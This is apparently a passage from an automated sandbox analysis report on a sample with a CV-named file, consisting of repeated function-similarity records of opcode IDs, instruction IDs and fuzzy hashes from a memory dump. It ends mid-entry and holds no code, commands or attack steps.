                                                                                                  • Instruction ID: c8afb707537f79d451ddea2fadb56c1dd5efd1dbec309f2fa19767ce67ba349b
                                                                                                  • Opcode Fuzzy Hash: 02bc8714011e877d645b8f2c9d6c52f4b82fe0223e5646375128c3c8b2ebef94
                                                                                                  • Instruction Fuzzy Hash: AF019E72610108AFC725DB19E809F16BBEDEFC5329F25816AE0458B2B1D7B8EC42DB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
                                                                                                  • Instruction ID: 6db8c6a4247afa9eaffb21891430864a223214163d91bc30fc5fde253e2ac00c
                                                                                                  • Opcode Fuzzy Hash: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
                                                                                                  • Instruction Fuzzy Hash: CB11CC7BA059818BD7128768C948B2577D8EF42779F1900F0ED019F682DB2CDC45F750
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1d78969a3de063c0e7614b86bbe96c2a5dc513fbd87671afc715f87d050cf35f
                                                                                                  • Instruction ID: 454b587fe3fb530ae8ac4f39df225524aeb2040a749bfe7e77c62fb771ce7a65
                                                                                                  • Opcode Fuzzy Hash: 1d78969a3de063c0e7614b86bbe96c2a5dc513fbd87671afc715f87d050cf35f
                                                                                                  • Instruction Fuzzy Hash: E701D236B00106AFD729DF04CE02F5A7AA5EB80760F19802CF9049B260E775DD44F790
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
                                                                                                  • Instruction ID: 869f67cdf2717b5b262910e745941a9e13900a855d3c5c9c5423a1dea88ebc47
                                                                                                  • Opcode Fuzzy Hash: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
                                                                                                  • Instruction Fuzzy Hash: 60012232805B11ABCB308F16D840A2B7BF4EF56B70B00862DFCD58B291C736D900EBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a46afda71c496b2249033fef27504000611ba6d1f97815fa30a4fd04d98b3efe
                                                                                                  • Instruction ID: a23d1b6bebf535938198f9a3c93440a31015833c2235f013eaee70895e0d0702
                                                                                                  • Opcode Fuzzy Hash: a46afda71c496b2249033fef27504000611ba6d1f97815fa30a4fd04d98b3efe
                                                                                                  • Instruction Fuzzy Hash: A9117C71A41218ABDB75EB24CC42FE972B4BF44B10F1041D5B719E60E1DB38AE85EF85
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
                                                                                                  • Instruction ID: e6e37b786500387c6e65dc30fc7118ec17aa52c1899e73cf5d03af34546eb43d
                                                                                                  • Opcode Fuzzy Hash: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
                                                                                                  • Instruction Fuzzy Hash: C3012872715555ABDB359B15C811B9BBF64DB41720F15C01AB90ADB2C0D674D880D3A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 91cbd3665f14aaa51a642041c9cb8072c2e4e68bf6017165f2881ba66f7c902f
                                                                                                  • Instruction ID: 55db9bdf43e9535c3e57a237f716bbee3cc9ebea92f3a0e79048506ce104e16d
                                                                                                  • Opcode Fuzzy Hash: 91cbd3665f14aaa51a642041c9cb8072c2e4e68bf6017165f2881ba66f7c902f
                                                                                                  • Instruction Fuzzy Hash: 0A016831B08603ABDF106E2A9C41D2677E9FB91320F04053CF84187651CBA4EC01E7D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e149e63e9bf1185c5f8b0f59dfee7aeff595d2b43a08dfa6699e88e1f5bb20f
                                                                                                  • Instruction ID: c03ac64965f285b24a98f6306b2a4b408ae6cbc247bac0b0a679183cd7070db2
                                                                                                  • Opcode Fuzzy Hash: 9e149e63e9bf1185c5f8b0f59dfee7aeff595d2b43a08dfa6699e88e1f5bb20f
                                                                                                  • Instruction Fuzzy Hash: 0F11C8326441469FD711CF58D810BA2F7BAFB5A314F1C815AE944CB312DB32EC45EBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ca403c61ee235e552ee2aa35de41177218293b63d3ebd3f3bfd9c5f6062f7515
                                                                                                  • Instruction ID: 353228abfa2f5bad869f358e40f22209d7746bbfea7bdad94447c897c8028675
                                                                                                  • Opcode Fuzzy Hash: ca403c61ee235e552ee2aa35de41177218293b63d3ebd3f3bfd9c5f6062f7515
                                                                                                  • Instruction Fuzzy Hash: 0311FAB1A002599FCB04DFA9D945AAEB7F8FF48310F10806AF915E7341D678EA01DBA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f1d83ac868dd65eb4fb93a02800fe1d55aa6db84394c05c84ec5231bfaf6c5ad
                                                                                                  • Instruction ID: 140847d893b4815d315dc1a32286af74cee5f66120796b7078f91ffc057efdfc
                                                                                                  • Opcode Fuzzy Hash: f1d83ac868dd65eb4fb93a02800fe1d55aa6db84394c05c84ec5231bfaf6c5ad
                                                                                                  • Instruction Fuzzy Hash: 2301D8315101509BCB32AB16D844D3AB7A9FFB3762B14406EF9455B111CB35DC45EB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 33099c94b167226ff5d989f8406134dadd859688caea4a2aa86de309dbb00f43
                                                                                                  • Instruction ID: e27660389e7de03c22a41a58f0145a2b3a71847d0c0162ac572f46421a30dc0e
                                                                                                  • Opcode Fuzzy Hash: 33099c94b167226ff5d989f8406134dadd859688caea4a2aa86de309dbb00f43
                                                                                                  • Instruction Fuzzy Hash: AB118071A00209EFDB04EF64CC55FEE7BB9EB44714F104099F911AB281EA39EE15EB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0e8bdf2aa60e564840ab4cd2a57371fd93b1bf89664f3b959bbd9be712c19c16
                                                                                                  • Instruction ID: fabb5a853a09ca5e39a16bc31ce65d139e6ab4000af4c956912ea7cbd35afb9f
                                                                                                  • Opcode Fuzzy Hash: 0e8bdf2aa60e564840ab4cd2a57371fd93b1bf89664f3b959bbd9be712c19c16
                                                                                                  • Instruction Fuzzy Hash: B101F7712005457FC710BB79CC81E53B7ACFF897A1B000225BA0883552CB68ED01DAF0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 73ba3d6f8996b74499db8b30818d892056b542a690a6d71165aa6db66af40cf3
                                                                                                  • Instruction ID: 5b4a44db0d96e28ad602baa0a0738a20cb777862910f484226b1271dbce6dd83
                                                                                                  • Opcode Fuzzy Hash: 73ba3d6f8996b74499db8b30818d892056b542a690a6d71165aa6db66af40cf3
                                                                                                  • Instruction Fuzzy Hash: A0012D32204211DBC720DF28D849BA6B7A9EF89760F19011AF828C7380D734ED44D7D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Instruction ID: f920a05823ab5666d57becd39d2dad1a5d8bb338f1e6be8715b07505aa5405e1
                                                                                                  • Opcode Fuzzy Hash: 2d61a3bfed072bebc3533729a18c2e1d60e765f99e10e027ec57f31171bb3125
                                                                                                  • Instruction Fuzzy Hash: DBF05E33701613ABC7319A4DDD82F12B3B8AF85B60F2D0869BA04DB260D664EC01AB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b57dcf760d001d8fcb2a4ca973f63ace28c885724fb9588a0843877043a58e11
                                                                                                  • Instruction ID: df588f399269e7247fa123880d572ce5172f41bc4e76d00a113e8cb8a057c410
                                                                                                  • Opcode Fuzzy Hash: b57dcf760d001d8fcb2a4ca973f63ace28c885724fb9588a0843877043a58e11
                                                                                                  • Instruction Fuzzy Hash: 5DF0A4706057049FC314EF28C946F1AB7E4EF88B14F444A5EF8A8DB385E638E900D796
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                  • Instruction ID: 28e095a306b7814e4774091a78880311ec26f0b3afc1068ab70ec4001cba6b55
                                                                                                  • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                  • Instruction Fuzzy Hash: 71F0B472610204EFE318DB21CC05B57B3EDEF99710F24C079A909D72A0FAB5ED01E615
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f322097544d905c2f6c2c7bc22ec9174a72d28101182ca231430cb8b904c4507
                                                                                                  • Instruction ID: 4fa38094e7b5511e53d91517d3e9c310d8c60bc9544e18f22c959ec7c6e138b6
                                                                                                  • Opcode Fuzzy Hash: f322097544d905c2f6c2c7bc22ec9174a72d28101182ca231430cb8b904c4507
                                                                                                  • Instruction Fuzzy Hash: F8F0E9329002456BC7316A19EC89F6BBB5DFBC5B70F09041EFCC6275228B796C82E780
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2d44525c1511fe131b984d2fcb68ea60acebd1a4e0ecc01a2aa2d45e6e7a58c3
                                                                                                  • Instruction ID: 6479bd8691feaedc0b6c069e02cbec3e1262bc9f9d66885f8dc1adc790201672
                                                                                                  • Opcode Fuzzy Hash: 2d44525c1511fe131b984d2fcb68ea60acebd1a4e0ecc01a2aa2d45e6e7a58c3
                                                                                                  • Instruction Fuzzy Hash: 02F04F70A01209DFCB04EF68CA16F9EB7F4EF48704F108459B915EB385DA38EA01DB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 71eae715b78b8601f777c8e49bccf52b2ed2b101264f1fbd6bdde35cff2e8ed7
                                                                                                  • Instruction ID: f12c3bec56b3d642a20fd06a9bbee01cb27686d8ae49bf51accc1d28595a7c34
                                                                                                  • Opcode Fuzzy Hash: 71eae715b78b8601f777c8e49bccf52b2ed2b101264f1fbd6bdde35cff2e8ed7
                                                                                                  • Instruction Fuzzy Hash: 27F02EB2C012A49EEB31C324C004BA1BFC8AB03370F098866DD39AB912C334FC86E250
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                  • Instruction ID: 39c757437897b2e86b506adaeda95eee4a76b8cfa05deaf7a659de66e97a270f
                                                                                                  • Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                  • Instruction Fuzzy Hash: 50E0D8727409402BD751AE598CD5F9777AEDFC2B10F040479B9045F142C9E6ED0993A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9c93fd1af60f26a924954de233687ebbe404677c1ae093efc1a59c19827e4fa7
                                                                                                  • Instruction ID: 50ec8ebd566276489dab87a4026b5de656844225239a52da3bca6653e98a9a79
                                                                                                  • Opcode Fuzzy Hash: 9c93fd1af60f26a924954de233687ebbe404677c1ae093efc1a59c19827e4fa7
                                                                                                  • Instruction Fuzzy Hash: E4F0E2B69216909BC721935CD048B6177D8AB01778F1EC16FD80E87512C765FC80E2C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
                                                                                                  • Instruction ID: 0ebd53a36c8756e9ff3b36f8ca4d7ba52d50f4e54c70373a9d8fa371c7e56673
                                                                                                  • Opcode Fuzzy Hash: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
                                                                                                  • Instruction Fuzzy Hash: 04F0E53351061467C230AA0D8C05F9BFBACDBD4B70F10032ABA249B1D1DA74EA01DBE5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0e02d0ac519888338047da62edbca67c87427cbb568f5e47be920c01166422d0
                                                                                                  • Instruction ID: 45d69563488b7d5268dc76d3d609176a3acb77e0cf54aa2c28eca641ce66f759
                                                                                                  • Opcode Fuzzy Hash: 0e02d0ac519888338047da62edbca67c87427cbb568f5e47be920c01166422d0
                                                                                                  • Instruction Fuzzy Hash: 4EF089706102559BDB04FB68D906E6E77F8AF04708F410458BA51EB2D5EA78D900C754
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80e51514bdf6df045f984f0f7a1f1651946ab44d522c34cda8b9765d6085f274
                                                                                                  • Instruction ID: dd98a1c3de3a116260e85324faf99decea370045b2284f5fb1f9609282a9976f
                                                                                                  • Opcode Fuzzy Hash: 80e51514bdf6df045f984f0f7a1f1651946ab44d522c34cda8b9765d6085f274
                                                                                                  • Instruction Fuzzy Hash: 0CF08970A102189BDB14FBA8D906EAE77F8AF04704F400458BA11EB2D5EA78D900C754
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                  • Instruction ID: eb96a79f8d91ab87d9716a05053e5cefd981c3a43eb1e91ed99a4d80148c8dec
                                                                                                  • Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                  • Instruction Fuzzy Hash: AAF0ED36204344DFEB05DF15E040AA57BE8ABA63A0B120094FE068B361DB39FD91EB85
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                  • Instruction ID: 184b88eb3f82ee8d758938722caba38d79f86973d323793bcde5479bca35f824
                                                                                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                  • Instruction Fuzzy Hash: 9CE09233644504ABE3215E659800B6B77B59BD5762F158826F788CB240DB74EC40F391
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e4006c1d87aeaf3b1e9d60ac6313c76d7ac9985f5ac1451b1c7dcc12017ca6ee
                                                                                                  • Instruction ID: 4d366ae834352b9a757789224b8054f1c57b4bd0147c38aa32138aae02a3a748
                                                                                                  • Opcode Fuzzy Hash: e4006c1d87aeaf3b1e9d60ac6313c76d7ac9985f5ac1451b1c7dcc12017ca6ee
                                                                                                  • Instruction Fuzzy Hash: 55F0E532104284EFEB26DF04C846F95B7A4EF80734F048019F40A8B0D1CB78DD82EB54
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
                                                                                                  • Instruction ID: 5f7cf1a1125816f9a72210fc96c33026e880d77330c641f7deb48b567e26a4c3
                                                                                                  • Opcode Fuzzy Hash: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
                                                                                                  • Instruction Fuzzy Hash: 95F08C31101700DFDB356A14ED52B5277E0AF407B0F114659B157069E1CB6CBC46FA44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e34d8b1e9544b35a6832514a92fbb8c39f367d50107a00a5c84dc41f29603271
                                                                                                  • Instruction ID: e38cea949c744505f5c8a56696ca3c15bc69a10af6dd3354af1f47d7187b0ccf
                                                                                                  • Opcode Fuzzy Hash: e34d8b1e9544b35a6832514a92fbb8c39f367d50107a00a5c84dc41f29603271
                                                                                                  • Instruction Fuzzy Hash: 94E0D833600114BFCB2197558D05F5BBABDDB54BA0F050065BA00E7191D534EE00E290
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 474b59cf91cb151479c195d9957a6f99dc839f882a4b9e352bac17641e774cdf
                                                                                                  • Instruction ID: b5ee7d20f8aa4d2e0af7a1386df46d50eac85cf8cac56a9cae315eb84db5c5d3
                                                                                                  • Opcode Fuzzy Hash: 474b59cf91cb151479c195d9957a6f99dc839f882a4b9e352bac17641e774cdf
                                                                                                  • Instruction Fuzzy Hash: 7CE09232100544ABC321BB19DC02F9B7BA9EF90361F004124F556571A2CA39BA10EBD4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c72ac461ecf9778c204ef95d385df9894fc12bf01f1d99566e3855b2dfeb267f
                                                                                                  • Instruction ID: 117a8382c3c91644c72072a190658711b17010d86f504b3829ed84d72ee0f141
                                                                                                  • Opcode Fuzzy Hash: c72ac461ecf9778c204ef95d385df9894fc12bf01f1d99566e3855b2dfeb267f
                                                                                                  • Instruction Fuzzy Hash: 1FD02B334560206ACBB5A1267C10FA33EBC9B46760F014476F60CD2010D918CC41F2C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                  • Instruction ID: 69e9f90033f35eb4e42e3f981a57045a1cd559c24dad6fa4f4f1bc0cceef2be8
                                                                                                  • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                  • Instruction Fuzzy Hash: 49E08C32440614EFDB317A24DC01F927AA1EF40BB0F20056AF086060A18BBCAC82FB48
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
                                                                                                  • Instruction ID: 739ea19cc9432605df0cbcc1fd89137b480c64adacff98ff1745501e7cca4c15
